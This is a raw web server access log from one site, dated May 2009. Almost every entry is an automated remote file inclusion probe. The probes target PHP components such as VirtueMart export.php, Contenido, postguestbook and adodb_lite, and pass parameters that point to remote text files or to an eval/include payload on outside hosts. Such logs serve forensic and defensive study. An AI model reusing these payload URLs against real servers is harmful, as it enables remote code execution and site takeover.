218.185.20.88 - - [31/May/2009:21:53:16 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:21:53:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:53:16 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:53:36 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:21:53:53 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:53:53 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:53:53 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:21:53:54 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:21:54:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:54:10 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:21:54:10 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:55:42 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:55:42 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:55:42 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
210.107.96.20 - - [31/May/2009:21:56:05 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://salam1.ucoz.com/vid.txt??? HTTP/1.1" 404 339
62.146.68.61 - - [31/May/2009:21:56:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
62.146.68.61 - - [31/May/2009:21:56:10 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
62.146.68.61 - - [31/May/2009:21:56:10 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
210.107.96.20 - - [31/May/2009:21:56:11 -0400] "GET /log/sdaglobal.org-error_log.4//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://salam1.ucoz.com/vid.txt??? HTTP/1.1" 404 365
62.146.68.61 - - [31/May/2009:21:56:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
62.146.68.61 - - [31/May/2009:21:56:13 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
62.146.68.61 - - [31/May/2009:21:56:13 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
210.107.96.20 - - [31/May/2009:21:56:14 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://salam1.ucoz.com/vid.txt??? HTTP/1.1" 404 335
85.10.128.219 - - [31/May/2009:21:56:38 -0400] "GET /log/sdaglobal.org-access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:21:57:25 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:57:25 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:57:25 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:21:57:28 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:57:28 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:57:28 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:21:57:29 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:57:29 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:57:29 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
38.99.44.104 - - [31/May/2009:21:57:50 -0400] "GET /robots.txt HTTP/1.0" 404 287
218.185.20.88 - - [31/May/2009:22:00:15 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:22:00:15 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:22:00:15 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:22:01:02 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:22:01:02 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:22:01:02 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
62.146.68.61 - - [31/May/2009:22:01:11 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
62.146.68.61 - - [31/May/2009:22:01:11 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
62.146.68.61 - - [31/May/2009:22:01:11 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:22:01:46 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:22:01:46 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:22:01:46 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
88.183.32.67 - - [31/May/2009:22:06:52 -0400] "GET /log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 334
88.183.32.67 - - [31/May/2009:22:06:52 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 330
123.143.98.5 - - [31/May/2009:22:07:14 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 330
123.143.98.5 - - [31/May/2009:22:07:14 -0400] "GET /log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 334
69.10.135.205 - - [31/May/2009:22:08:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:22:08:16 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
69.10.135.205 - - [31/May/2009:22:08:16 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
88.183.32.67 - - [31/May/2009:22:08:22 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 330
69.10.135.205 - - [31/May/2009:22:08:58 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:22:08:58 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:22:08:58 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
88.183.32.67 - - [31/May/2009:22:09:08 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 330
88.183.32.67 - - [31/May/2009:22:09:08 -0400] "GET /log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 334
88.183.32.67 - - [31/May/2009:22:10:32 -0400] "GET /log/sdaglobal.org-access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 359
123.143.98.5 - - [31/May/2009:22:10:35 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 361
123.143.98.5 - - [31/May/2009:22:10:38 -0400] "GET /log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 334
123.143.98.5 - - [31/May/2009:22:10:39 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 330
88.183.32.67 - - [31/May/2009:22:10:41 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 361
62.146.68.61 - - [31/May/2009:22:11:38 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
88.183.32.67 - - [31/May/2009:22:12:51 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 330
88.183.32.67 - - [31/May/2009:22:12:51 -0400] "GET /log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 334
125.214.247.60 - - [31/May/2009:22:13:32 -0400] "GET /images/gd.gif HTTP/1.0" 200 4458
123.143.98.5 - - [31/May/2009:22:13:38 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 361
217.147.29.190 - - [31/May/2009:22:14:03 -0400] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 319
217.147.29.190 - - [31/May/2009:22:14:03 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 315
217.147.29.190 - - [31/May/2009:22:14:03 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 346
69.10.135.205 - - [31/May/2009:22:14:10 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
69.10.135.205 - - [31/May/2009:22:14:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:22:14:10 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:22:14:42 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:22:14:42 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:22:14:42 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
217.147.29.190 - - [31/May/2009:22:14:46 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 315
217.147.29.190 - - [31/May/2009:22:14:46 -0400] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 319
217.147.29.190 - - [31/May/2009:22:14:46 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 346
218.185.20.88 - - [31/May/2009:22:15:13 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:22:16:15 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:22:17:30 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
219.117.223.106 - - [31/May/2009:22:17:49 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 303
219.117.223.106 - - [31/May/2009:22:17:49 -0400] "GET /log//vwar/convert/mvcw.php?step=1&vwar_root=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 307
219.117.223.106 - - [31/May/2009:22:17:52 -0400] "GET /log/sdaglobal.org-access_log.1//vwar/convert/mvcw.php?step=1&vwar_root=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 334
69.10.135.205 - - [31/May/2009:22:18:08 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:18:08 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:18:08 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
217.147.29.190 - - [31/May/2009:22:18:10 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 348
69.10.135.205 - - [31/May/2009:22:18:15 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:22:18:46 -0400] "GET /log/sdaglobal.org-access_log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 347
217.147.29.190 - - [31/May/2009:22:18:53 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 348
69.10.135.205 - - [31/May/2009:22:18:56 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:18:56 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:18:57 -0400] "GET /log/sdaglobal.org-access_log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 347
69.10.135.205 - - [31/May/2009:22:18:58 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:18:58 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:18:58 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:18:59 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:19:00 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:19:00 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:19:17 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:19:17 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:19:19 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:19:19 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:19:21 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 351
69.10.135.205 - - [31/May/2009:22:19:23 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 351
69.10.135.205 - - [31/May/2009:22:19:53 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:19:54 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:20:50 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:20:50 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:20:50 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:20:52 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 318
69.10.135.205 - - [31/May/2009:22:20:52 -0400] "GET /log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 322
69.10.135.205 - - [31/May/2009:22:20:52 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:22:15 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 351
69.10.135.205 - - [31/May/2009:22:22:37 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 351
69.10.135.205 - - [31/May/2009:22:22:43 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
69.10.135.205 - - [31/May/2009:22:23:05 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 349
217.147.29.190 - - [31/May/2009:22:23:45 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 348
217.147.29.190 - - [31/May/2009:22:25:42 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 348
69.10.135.205 - - [31/May/2009:22:26:48 -0400] "GET /log/sdaglobal.org-access_log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 347
69.10.135.205 - - [31/May/2009:22:26:55 -0400] "GET /log/sdaglobal.org-access_log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 347
217.147.29.190 - - [31/May/2009:22:30:30 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 346
85.10.128.219 - - [31/May/2009:22:33:08 -0400] "GET /news.php?absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 289
85.10.128.219 - - [31/May/2009:22:33:08 -0400] "GET /log/news.php?absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 293
85.10.128.219 - - [31/May/2009:22:33:08 -0400] "GET /log/sdaglobal.org-access_log.1/news.php?absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320
62.146.68.61 - - [31/May/2009:22:33:50 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 321
62.146.68.61 - - [31/May/2009:22:33:53 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 325
62.146.68.61 - - [31/May/2009:22:33:53 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 354
217.147.29.190 - - [31/May/2009:22:34:42 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 346
62.146.68.61 - - [31/May/2009:22:35:11 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 321
62.146.68.61 - - [31/May/2009:22:35:11 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 325
62.146.68.61 - - [31/May/2009:22:35:11 -0400] "GET /log/sdaglobal.org-access_log.4/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 352
207.182.137.218 - - [31/May/2009:22:36:11 -0400] "GET /log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 331
207.182.137.218 - - [31/May/2009:22:36:11 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 327
